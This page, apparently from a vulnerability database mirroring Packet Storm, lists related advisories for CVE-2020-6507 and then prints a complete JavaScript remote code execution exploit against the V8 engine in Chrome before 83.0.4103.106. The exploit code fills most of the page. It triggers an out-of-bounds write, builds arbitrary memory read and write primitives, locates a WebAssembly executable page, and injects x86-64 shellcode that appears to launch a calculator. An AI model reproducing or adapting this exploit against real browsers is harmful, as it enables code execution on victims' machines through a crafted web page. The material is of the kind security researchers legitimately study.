Google Chrome 81.0.4044 V8 Remote Code Execution

🗓️ 06 Apr 2021 00:00:00Reported by Tobias MarcottoType

packetstorm🔗 packetstormsecurity.com👁 831 Views

Google Chrome V8 Remote Code Execution Descriptio

Reporter	Title	Published	Views	Family All 63
0day.today	Google Chrome 81.0.4044 V8 - Remote Code Execution Exploit	6 Apr 202100:00	–	zdt
AlpineLinux	CVE-2020-6507	22 Jul 202016:15	–	alpinelinux
Tenable Nessus	CentOS 6 : chromium-browser (RHSA-2020:2643)	9 Oct 202400:00	–	nessus
Tenable Nessus	Debian DSA-4714-1 : chromium - security update	2 Jul 202000:00	–	nessus
Tenable Nessus	Fedora 32 : chromium (2020-08561721ad)	2 Jul 202000:00	–	nessus
Tenable Nessus	Fedora 31 : chromium (2020-77f89ab772)	8 Jul 202000:00	–	nessus
Tenable Nessus	GLSA-202007-08 : Chromium, Google Chrome: Multiple vulnerabilities	27 Jul 202000:00	–	nessus
Tenable Nessus	Google Chrome < 83.0.4103.106 Multiple Vulnerabilities	18 Jun 202000:00	–	nessus
Tenable Nessus	Google Chrome < 83.0.4103.106 Multiple Vulnerabilities	18 Jun 202000:00	–	nessus
Tenable Nessus	openSUSE Security Update : chromium (openSUSE-2020-845)	20 Jul 202000:00	–	nessus

`# Exploit Title: Google Chrome prior 83.0.4103.106 V8 - Remote Code Execution  
# Date: 06/04/2021  
# Exploit Author: Tobias Marcotto  
# Tested on: Kali Linux x64   
# Version: 83.0.4103.106  
# Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.  
# CVE: CVE-2020-6507  
  
  
*********************************************************************************************************  
  
  
var buf = new ArrayBuffer(8);  
var f64_buf = new Float64Array(buf);  
var u64_buf = new Uint32Array(buf);  
  
var arraybuf = new ArrayBuffer(0x13373);  
var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]);  
var mod = new WebAssembly.Module(wasm_code);  
var wasm_instance = new WebAssembly.Instance(mod);  
var shell = wasm_instance.exports.shell;  
var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337];  
  
var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]);  
  
function ftoi(val) {  
f64_buf[0] = val;  
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);  
}  
function itof(val) {  
u64_buf[0] = Number(val & 0xffffffffn);  
u64_buf[1] = Number(val >> 32n);  
return f64_buf[0];  
}  
  
array = Array(0x40000).fill(1.1);  
args = Array(0x100 - 1).fill(array);  
args.push(Array(0x40000 - 4).fill(2.2));  
giant_array = Array.prototype.concat.apply([], args);  
giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);  
  
length_as_double =  
new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0];  
  
function trigger(array) {  
var x = array.length;  
x -= 67108861;  
x = Math.max(x, 0);  
x *= 6;  
x -= 5;  
x = Math.max(x, 0);  
  
let corrupting_array = [0.1, 0.1];  
let corrupted_array = [0.1];  
  
corrupting_array[x] = length_as_double;  
return [corrupting_array, corrupted_array];  
}  
  
for (let i = 0; i < 30000; ++i) {  
trigger(giant_array);  
}  
  
corrupted_array = trigger(giant_array)[1];  
  
var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];  
function searchmem(value)  
{  
skip = 0;  
for(i=0; i<search_space.length; ++i)  
{  
for(j=search_space[i][0];j<search_space[i][1];++j)  
{  
if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))  
{  
if(skip++ == 2) // Probably the first two are due to the search itself  
return j;  
}  
}  
}  
return -1;  
}  
  
function searchmem_full(value)  
{  
for(i=0;i<search_space.length;++i)  
{  
for(j=search_space[i][0];j<search_space[i][1];++j)  
{  
if((ftoi(corrupted_array[j]) === value))  
{  
if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))  
{  
return j;  
}  
}  
}  
}  
return -1;  
}  
  
var arraybuf_idx = searchmem(0x13373n);  
if(arraybuf_idx == -1)  
{  
alert('Failed 1');  
throw new Error("Not found");  
}  
document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>");  
function arb_read(addr, length)  
{  
var data = [];  
let u8_arraybuf = new Uint8Array(arraybuf);  
corrupted_array[arraybuf_idx+1] = itof(addr);  
for(i=0;i<length;++i)  
data.push(u8_arraybuf[i]);  
return data;  
}  
  
function arb_write(addr, data)  
{  
corrupted_array[arraybuf_idx+1] = itof(addr);  
let u8_arraybuf = new Uint8Array(arraybuf);  
for(i=0;i<data.length;++i)  
u8_arraybuf[i] = data[i];  
}  
  
idx = searchmem_full((1337332n << 33n) + (1337331n << 1n));  
if (idx == -1)  
{  
alert('Failed 2');  
throw new Error("Not found");  
}  
  
wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;  
document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>");  
rwx_idx = Number((wasm_addr-1n+0x68n)/8n);  
rwx_addr = ftoi(corrupted_array[rwx_idx-1]);  
if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)  
{  
rwx_addr >>= 32n;  
rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;  
}  
document.write("rwx addr: 0x"+rwx_addr.toString(16));  
arb_write(rwx_addr, shellcode);  
shell();`

06 Apr 2021 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.30621